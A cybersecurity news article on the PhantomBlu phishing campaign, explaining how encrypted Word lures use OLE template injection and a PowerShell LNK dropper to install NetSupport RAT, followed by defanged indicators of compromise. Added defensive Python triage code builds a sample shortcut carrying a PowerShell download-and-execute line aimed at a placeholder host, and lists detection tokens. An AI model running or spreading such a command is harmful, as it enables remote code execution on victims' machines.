Operation PhantomBlu: Attackers Utilising Weaponized MS Office Doc to Hack Windows

by Esmeralda McKenzie

Researchers from Perception Point identified a novel malware campaign, PhantomBlu, targeting US organizations. It uses new techniques to deploy NetSupport RAT, a remote access trojan, by abusing legitimate features of Microsoft Office document templates through OLE manipulation.

This lets the attackers evade detection and take control of victim machines for a range of malicious activities, including keylogging, file transfer, and lateral movement within the network.


Threat actors sent phishing emails carrying fake monthly salary reports to lure employees into downloading malicious DOCX files, and sent them through a legitimate email delivery platform to avoid detection.

On opening the DOCX file, users were prompted to enable editing and to click an embedded OLE object disguised as a printer icon.

Targets are prompted to enter the password “1” and to click “Enable Editing”.

Clicking the icon triggered OLE template manipulation (T1221) to retrieve an archive containing a malicious LNK file; this is the first observed instance of T1221 being used to deliver NetSupport RAT.
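The delivery chain above hinges on two document features that can be inspected statically: the attachedTemplate relationship that makes Word fetch a template from a remote host when the file is opened (the T1221 primitive), and the embedded OLE object that plays the printer icon. The following Python is an added triage example, not code from this article or from Perception Point; it uses only the standard library, builds its own constructed sample document, and the template URL, relationship IDs and file names in it are placeholders.

```python
"""Added triage helper: inspect a .docx for the two delivery primitives the
PhantomBlu lure relies on, a remote attachedTemplate relationship (Office
template injection, T1221) and an embedded OLE object.  The sample document
built at the bottom is constructed for this example; it is not the real lure."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
OLE_OBJECT = ("http://schemas.openxmlformats.org/officeDocument/2006/"
              "relationships/oleObject")
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE compound file header


def scan_docx(data: bytes) -> dict:
    """Return remote template targets and embedded OLE objects found in a .docx."""
    findings = {"encrypted": False, "remote_templates": [], "ole_objects": []}
    if data.startswith(CFB_MAGIC):
        # A password-protected OOXML file is wrapped in an OLE compound file; the
        # ZIP inside cannot be read until it is decrypted with the lure's password.
        findings["encrypted"] = True
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                # A template relationship that leaves the package is the T1221 hook.
                if rtype == ATTACHED_TEMPLATE and (external or re.match(r"[a-z]+://", target, re.I)):
                    findings["remote_templates"].append(target)
                elif rtype == OLE_OBJECT:
                    findings["ole_objects"].append(target)
    return findings


def build_sample_docx(template_url: str = "", with_ole: bool = False) -> bytes:
    """Constructed minimal .docx used as sample input for scan_docx(); not the real lure."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    doc_rels, settings_rels = [], []
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml",
                   f'<w:document xmlns:w="{w_ns}"><w:body><w:p/></w:body></w:document>')
        if with_ole:
            # Embedded OLE object; in the lure this was the fake "printer icon".
            z.writestr("word/embeddings/oleObject1.bin", CFB_MAGIC + b"\0" * 8)
            doc_rels.append(f'<Relationship Id="rId5" Type="{OLE_OBJECT}" '
                            'Target="embeddings/oleObject1.bin"/>')
        if template_url:
            # settings.xml points at an attached template that lives on a remote host.
            z.writestr("word/settings.xml",
                       f'<w:settings xmlns:w="{w_ns}" xmlns:r="{r_ns}">'
                       '<w:attachedTemplate r:id="rId1"/></w:settings>')
            settings_rels.append(f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                                 f'Target="{template_url}" TargetMode="External"/>')
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{REL_NS}">{"".join(doc_rels)}</Relationships>')
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{REL_NS}">{"".join(settings_rels)}</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host; the real campaign's hosts are in the IOC list below.
    lure = build_sample_docx("http://template.example.invalid/x.dotm", with_ole=True)
    print(scan_docx(lure))
```

A real PhantomBlu lure is password-protected, so the ZIP container is wrapped in an OLE compound file and `scan_docx()` reports it as encrypted; it has to be decrypted with the lure password (here “1”) before the relationships can be read. A clean document produces no remote template and no OLE object, which is the baseline an analyst compares against.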


Dissecting the Malware: From Entice to Control

Forensic analysis of the LNK file revealed a PowerShell dropper that fetched a heavily obfuscated script from a URL; that script retrieved a second URL, downloaded a ZIP file, and unpacked it to run the NetSupport RAT.

Inspecting the LNK file's code
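The LNK analysis above comes down to reading the shortcut's stored command line, because the PowerShell one-liner lives in the shortcut's StringData rather than in a file of its own. The following Python is an added example, not code from this article or from Perception Point: it parses that section by hand following the public [MS-SHLLINK] layout, flags generic download-and-execute tokens (an assumed indicator list, not taken from the sample), and builds its own constructed shortcut; the paths and URL in it are placeholders.

```python
"""Added forensic helper: read the StringData section of a Windows shortcut
(.lnk) so the PowerShell command line a dropper LNK carries can be recovered
without resolving or executing the shortcut.  Offsets follow [MS-SHLLINK];
the shortcut built at the bottom is constructed, not the PhantomBlu sample."""
import struct

# LinkFlags bits from the ShellLinkHeader
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Tokens a PowerShell download-and-execute one-liner typically contains
# (assumed generic indicators, not taken from the PhantomBlu sample).
INDICATORS = ("powershell", "pwsh", "-enc", "hidden", "-nop", "iex", "invoke-expression",
              "downloadstring", "downloadfile", "invoke-webrequest", "http")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link as a dict of str."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Windows shell link")
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip IDListSize + IDList
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                      # LinkInfoSize covers the whole block
        size, = struct.unpack_from("<I", data, off)
        off += size
    fields = {}
    for bit, key in STRING_FIELDS:                 # fixed order per the spec
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, off)
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        off += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def triage_lnk(data: bytes) -> dict:
    """Parse the shortcut and flag download-and-execute tokens in its strings."""
    fields = parse_lnk(data)
    text = " ".join(fields.values()).lower()
    hits = [tok for tok in INDICATORS if tok in text]
    return {"fields": fields, "indicators": hits, "suspicious": bool(hits)}


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal .lnk (empty IDList, no LinkInfo) for exercising the parser."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(0x4C, b"\0")
    id_list = struct.pack("<H", 2) + b"\0\0"       # IDListSize=2, TerminalID only

    def string_data(value: str) -> bytes:
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")

    return header + id_list + string_data(relative_path) + string_data(arguments)


if __name__ == "__main__":
    # Placeholder download host; the campaign's real URLs are in the IOC list below.
    sample = build_sample_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "-w hidden -nop -c \"iex (New-Object Net.WebClient)"
        ".DownloadString('http://dropper.example.invalid/s.txt')\"")
    print(triage_lnk(sample))
```

The parser deliberately skips the IDList and LinkInfo blocks by their own size fields instead of interpreting them, since the command line is what the analyst needs first; a shortcut whose relative path is PowerShell and whose arguments fetch over HTTP is the shape of the dropper described above.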

The script also established persistence by adding an autostart registry key. The researchers bypassed the user-agent gating on the secondary URL, which served its content only to requests carrying the expected User-Agent, and confirmed the script's functionality.

Obfuscated PowerShell retrieved from the URL

The downloaded ZIP contained another PowerShell script that ultimately dropped and executed NetSupport RAT (Client32.exe), revealing its C2 server infrastructure.

The NetSupport RAT's C2 servers

According to Perception Point, PhantomBlu delivers NetSupport RAT in a novel way: encrypted .docx files act as carriers, exploiting OLE template injection (T1221) to deliver the payload.

PhantomBlu “Attack Tree” unpacked by Perception Point's advanced detection engines

It bypasses traditional security controls by hiding the malicious code inside the template and requiring user interaction for execution, which marks a shift from previous NetSupport RAT campaigns that relied on generic phishing techniques and executable files.

The URLs include parameters, some of which reference “.txt” files and email message details, citing “sendinblue.com” and “sender-sib.com” in the Message-ID and Return-Path, respectively.

The data below are the Indicators of Compromise (IOCs) linked to this campaign: hashes for each file type in the chain (DOCX, ZIP, LNK, and EXE) listed alongside the malicious URLs, hostnames, and IP addresses.



IOCs

Hashes (SHA-256)

Electronic mail – 16e6dfd67d5049ffedb8c55bee6ad80fc0283757bc60d4f12c56675b1da5bf61

Docx – 1abf56bc5fbf84805ed0fbf28e7f986c7bb2833972793252f3e358b13b638bb1

Injected ZIP – 95898c9abce738ca53e44290f4d4aa4e8486398de3163e3482f510633d50ee6c

LNK file – d07323226c7be1a38ffd8716bc7d77bdb226b81fd6ccd493c55b2711014c0188

Closing ZIP – 94499196a62341b4f1cd10f3e1ba6003d0c4db66c1eb0d1b7e66b7eb4f2b67b6

Client32.exe – 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1

URLs and Hostnames

yourownmart[.]com/solar[.]txt

firstieragency[.]com/depbrndksokkkdkxoqnazneifidmyyjdpji[.]txt

yourownmart[.]com

firstieragency[.]com

parabmasale[.]com

tapouttv28[.]com

IP Addresses

192[.]236[.]192[.]48

173[.]252[.]167[.]50

199[.]188[.]205[.]15

46[.]105[.]141[.]54

Source credit : cybersecuritynews.com
